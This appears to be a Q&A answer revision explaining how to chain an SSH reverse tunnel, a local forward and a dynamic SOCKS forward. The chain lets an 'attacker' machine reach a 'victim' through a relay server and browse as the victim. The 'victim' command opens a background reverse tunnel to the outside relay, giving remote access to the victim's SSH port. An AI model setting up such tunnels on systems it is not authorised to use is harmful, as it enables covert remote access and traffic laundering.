Restructure (Some explanations were not with the correct example), and add formatting
Apparently nobody can answer this question, that's okay because I found the answer myself.

  • On victim: ssh -N -f -R 5555:localhost:22 -p <port_of_serv> <ip_of_serv>
  • On attacker #1: ssh (-N -f) -L 4444:localhost:5555 -p <port_of_serv> <ip_of_serv>
  • On attacker #2: ssh -p 4444 -D localhost:3333 user_on_victim@localhost
  • On attacker #3: in Firefox or irc, or even for the General network settings: Socks (v5) proxy settings: 127.0.0.1 port 3333

Every application you set up for host localhost, port 3333, will be tunneled via serv to the victim, and when you visit something like http://myip.com you'll see the ip/host of the victim. From here on you can even use GUI applications on the attacker (if you set up SOCKS settings for the specific app or for the system as a whole) which will be tunneled via serv to victim and you'll act as the victim as such.

The mistake I made in my thought process was that I didn't really understand what the reversed port scheme looks like. I will try to explain it in simple terms.

Victim action

ssh -N -f -R 5555:localhost:22 -p <port_of_serv> <ip_of_serv>
  • -N = I'm not going to run commands in the shell
  • -f = put the process in the background (so you can close the terminal window)
  • -R = reversed tunnel
  • 5555:localhost:22 = 5555 is the port on which serv internally is listening to put data forward to port 22 on victim. If you've set up victim to have ssh run on port 2222 you should change 22 to 2222.
  • -p = port on which ssh on serv is running.

1st attack action

ssh (-N -f) -L 4444:localhost:5555 -p <port_of_serv> <ip_of_serv>

The 1st command you make on attacker (-L 4444:localhost:5555) will set up a tunnel so that your connection with your 3rd command will be tunneled right through to victim. (This is just for dynamic port forwarding / SOCKS applications.)

If you just want to have shell access on victim, instead of this command you just ssh in to serv and then run the command: 'ssh user_on_victim@localhost -p 5555'.

But we don't want shell access, we want to tunnel all data dynamically so we have to make a port-forward.

Or the schematic explanation:

  • -L = local port-forwarding (on serv)
  • 4444:localhost:5555 = put all data coming in on port 4444 to port 5555.

2nd attack action

The 2nd command you make on attacker

ssh -p 4444 -D localhost:3333 user_on_victim@localhost

is the actual command that's going to initialise the connection through the 2 tunnels. What you do is you say: connect to port 4444 and put all the data that's coming in on localhost port 3333 to 4444 (which will be put through locally on serv to port 5555, which will be pushed out to port 22 on victim).

Or the schematic explanation:

  • -D = Dynamic forwarding
  • localhost:3333 = listen on port 3333 and push data through ssh connection to port 4444 to serv.
  • -p 4444 = the port on which serv is listening to put the data forward to port 5555 and then out to port 22 on victim.

3rd attack action

Set up your applications or even your entire system to use a SOCKS (v5) proxy server on address localhost, port 3333. It does not matter on which ports these applications normally run because that will be handled by the proxy server. In theory every application can run via SOCKS proxy dynamic port forwarding. You'll only have to set it up. :)

The 3rd action on attacker is the actual data you're going to tunnel to victim. It does not matter what data or application this is, that's why it's dynamic forwarding; it does not matter on which ports these applications run because that will be handled by SOCKS.
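As an added illustration (not part of iz0r's answer), a small POSIX shell helper that parses the -R, -L and -D specs of the three commands above and states, for each hop, which host ends up listening and where the data goes, including the point the answer stumbled over: "localhost" in a -R spec is resolved on the ssh client side, while in a -L spec it is resolved on the sshd side. The host names victim, serv and attacker are the answer's own; the script opens no connections.

```shell
#!/bin/sh
# Added example, not from the original answer: explain the SSH forwards in the
# answer's three commands (port:host:hostport form only). Nothing connects anywhere.
#
# explain_forward <host_running_ssh> <host_running_sshd> <flag> <spec>
#   -R  sshd side listens; "host" is resolved by the ssh client side
#   -L  ssh client side listens; "host" is resolved by the sshd side
#   -D  ssh client side runs a SOCKS listener; destinations are chosen per
#       connection and leave the tunnel from the sshd side
explain_forward() {
  client=$1 server=$2 flag=$3 spec=$4
  case $flag in
    -R|-L)
      lport=${spec%%:*}          # listening port
      rest=${spec#*:}
      thost=${rest%%:*}          # target host as written in the spec
      tport=${rest#*:}           # target port
      ;;
  esac
  case $flag in
    -R)
      [ "$thost" = localhost ] && thost=$client
      echo "$server:$lport -> $thost:$tport (sshd on $server listens; $client connects onward)"
      ;;
    -L)
      [ "$thost" = localhost ] && thost=$server
      echo "$client:$lport -> $thost:$tport (ssh on $client listens; $server connects onward)"
      ;;
    -D)
      lport=${spec##*:}          # drop an optional bind address such as "localhost:"
      echo "$client:$lport -> SOCKS5, destination chosen by each client connection, exits from $server"
      ;;
    *)
      echo "unsupported forward flag: $flag" >&2
      return 1
      ;;
  esac
}

# The answer's three commands in order. The -D command is typed against
# localhost:4444 on attacker, but the sshd reached through the two tunnels is
# victim's, so victim is the sshd side of that hop.
tunnel_chain() {
  explain_forward victim   serv   -R 5555:localhost:22    # ssh -N -f -R 5555:localhost:22 -p <port_of_serv> <ip_of_serv>
  explain_forward attacker serv   -L 4444:localhost:5555  # ssh (-N -f) -L 4444:localhost:5555 -p <port_of_serv> <ip_of_serv>
  explain_forward attacker victim -D localhost:3333       # ssh -p 4444 -D localhost:3333 user_on_victim@localhost
}

tunnel_chain
```

Read the three output lines bottom-up to follow a SOCKS client's packet: attacker:3333 to attacker:4444, then serv:5555, then victim:22, which is the path the answer describes in words.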

iz0r

Apparently nobody can answer this question, that's okay because I found the answer myself.

Here are the answers:

  • On 'victim': ssh -N -f -R 5555:localhost:22 -p <port_of_serv> <ip_of_serv>
  • On 'attacker' #1: ssh (-N -f) -L 4444:localhost:5555 -p <port_of_serv> <ip_of_serv>
  • On 'attacker' #2: ssh -p 4444 -D localhost:3333 user_on_victim@localhost
  • On 'attacker' #3: in Firefox or irc, or even for the General network settings: Socks (v5) proxy settings: 127.0.0.1 port 3333

Every application you set up for host localhost, port 3333, will be tunneled via serv to the victim, and when you visit something like myip.com you'll see the ip/host of the victim. From here on you can even use GUI applications on the 'attacker' (if you set up SOCKS settings for the specific app or for the system as a whole) which will be tunneled via 'serv' to 'victim' and you'll act as the 'victim' as such.

The mistake I made in my thought process was that I didn't really understand what the reversed port scheme looks like. I will try to explain it in simple terms.

1st command: The 1st command you make on 'attacker' (-L 4444:localhost:5555) will set up a tunnel so that your connection with your 3rd command will be tunneled right through to 'victim'. (This is just for dynamic port forwarding / SOCKS applications.) If you just want to have shell access on 'victim', instead of this command you just ssh in to serv and then run the command: 'ssh user_on_victim@localhost -p 5555'. But we don't want shell access, we want to tunnel all data dynamically so we have to make a port-forward.

Or the schematic explanation:

  • -N = I'm not going to run commands in the shell
  • -f = put the process in the background (so you can close the terminal window)
  • -R = reversed tunnel
  • 5555:localhost:22 = 5555 is the port on which serv internally is listening to put data forward to port '22' on 'victim'. If you've set up victim to have ssh run on port '2222' you should change '22' to '2222'.
  • -p = port on which ssh on 'serv' is running.

The 2nd command you make on 'attacker' (ssh -p 4444 -D localhost:3333 user_on_victim@localhost) is the actual command that's going to initialise the connection through the 2 tunnels. What you do is you say: connect to port 4444 and put all the data that's coming in on localhost port 3333 to 4444 (which will be put through locally on 'serv' to port 5555, which will be pushed out to port 22 on 'victim').

Or the schematic explanation:

  • -L = local port-forwarding (on 'serv')
    • 4444:localhost:5555 = put all data coming in on port 4444 to port 5555.

The 3rd action on 'attacker' is the actual data you're going to tunnel to 'victim'. It does not matter what data or application this is, that's why it's dynamic forwarding, it does not matter on which ports these application run because that will be handled by SOCKS.

Or the schematic explanation:

  • -D = Dynamic forwarding
  • localhost:3333 = listen on port 3333 and push data through the ssh connection to port 4444 to serv.
  • -p 4444 = the port on which 'serv' is listening to put the data forward to port 5555 and then out to port 22 on 'victim'.

Last thing you have to do:

  • Set up your applications or even your entire system to use a SOCKS (v5) proxy server on address localhost, port 3333. It does not matter on which ports these applications normally run because that will be handled by the proxy server. In theory every application can run via SOCKS proxy dynamic port forwarding. You'll only have to set it up. :)

I hope someone finds use in my explanation.

Have a nice day....